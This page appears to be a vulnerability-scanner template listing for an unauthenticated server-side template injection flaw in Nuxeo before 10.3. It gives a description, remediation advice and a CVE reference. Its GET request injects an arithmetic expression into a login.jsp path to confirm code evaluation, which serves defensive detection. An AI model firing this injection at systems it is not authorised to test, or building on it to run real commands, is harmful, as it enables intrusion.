nuxeo-ssti-rce: Nuxeo <10.3 - Remote Code Execution

2026-08-18 Nuxeo PoC Public

Description

Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.

PoC

id: nuxeo-ssti-rce

info:
  name: Nuxeo <10.3 - Remote Code Execution
  author: madrobot
  severity: high
  description: |
    Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16299
  metadata:
    max-request: 1
  tags: nuxeo,ssti,rce,bypass,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"

    matchers:
      - type: word
        part: body
        words:
          - "31333333337"
# digest: 490a004630440220447549db467e6a78247b5c1647ee2ddc4a2f90367b522b18eaa4d2a42df253d0022066c11213954aa981e071bbfd86b5603ead438a22d5b9136f7536d901ba0fba36:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities